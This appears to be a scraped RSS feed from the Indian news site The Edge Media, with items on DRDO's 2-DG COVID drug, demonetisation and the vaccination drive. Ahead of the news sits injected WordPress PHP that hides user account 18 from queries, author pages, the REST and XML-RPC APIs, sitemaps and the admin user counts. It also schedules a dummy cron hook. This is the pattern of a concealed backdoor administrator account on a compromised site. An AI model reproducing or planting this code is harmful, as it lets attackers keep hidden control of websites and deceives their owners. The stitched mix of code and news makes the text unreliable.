add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post DRDO’S Anti-COVID Drug Launched appeared first on The Edge Media.
]]>This comes in after DGCI approved the oral drug for emergency use. Earlier on May 8, the defense ministry said that the clinical trials of the drug 2-DG, 2-deoxy-D-Glucose showed that it helps in faster recovery of hospitalized patients and reduces supplemental oxygen dependability.
The drug comes has been developed by INMAS with Dr. Reddy’s Laboratories in Hyderabad. It comes in powder form in a sachet and can be consumed orally with water.

Health Minister, Harsha Vardhan said that under the leadership of Rajnath Singh and with the help of DRDO this might be the first indigenous research-based outcome to fight against Covid-19. He also said that under Prime Minister, Narendra Modi DRDO has played a vital role in the fight against Covid-19. He added, hopefully, it serves in the fight against Covid-19 not just for India but globally. Moreover, he thanked and congratulated, DRDO and its scientists.
The post DRDO’S Anti-COVID Drug Launched appeared first on The Edge Media.
]]>The post On the night of demonetisation, jewelers companies deposited Rs 111 crore in just four hours in the bank appeared first on The Edge Media.
]]>The post On the night of demonetisation, jewelers companies deposited Rs 111 crore in just four hours in the bank appeared first on The Edge Media.
]]>The post Prime Minister Narendra Modi to start Corona vaccination campaign on Saturday at 10:30 am appeared first on The Edge Media.
]]>The Prime Minister’s Office said that during the Covid-19 vaccination campaign to be launched by the Prime Minister on January 16, more than 3,000 locations will be digitally connected in all states and union territories. Adequate doses of vaccines were sent to all the states and union territories with the active cooperation of the Ministry of Civil Aviation, and the states and union territories sent them to all districts. Call center and helpline 1075 have been established to operate 24 hours and seven days to address questions related to Covid-19 epidemic, vaccination and its digital platform. All preparations have been completed to start the campaign of Covid-19 vaccination on the principle of public participation.
Vaccination process for rescue from Corona will be started at 3000 centers on Saturday. People will be vaccinated at every center in a session every day. VK Paul said, “As the program progresses, more than 5,000 centers will be vaccinated.”
Let it be said that about three lakh health workers will be vaccinated on the first day of the vaccination campaign. Official sources have given this information. There will be a maximum of 100 beneficiaries in each vaccination session. The Union Health Ministry has asked the states not to vaccinate in large numbers at every site. The ministry said on Wednesday that states have been advised to organize vaccination sessions keeping in view 10% of the reserve / waste doses and an average of 100 vaccinations in each session daily.
The post Prime Minister Narendra Modi to start Corona vaccination campaign on Saturday at 10:30 am appeared first on The Edge Media.
]]>The post Covid-19: PM Modi in discussion with Chief Ministers, our vaccine is the most economical appeared first on The Edge Media.
]]>Prime Minister Modi said that I am satisfied that during the Kovid crisis we worked together, decisions were taken immediately with full sensitivity. The result of this is that the corona infection in India did not spread to the level at which it spread to other countries of the world.
The post Covid-19: PM Modi in discussion with Chief Ministers, our vaccine is the most economical appeared first on The Edge Media.
]]>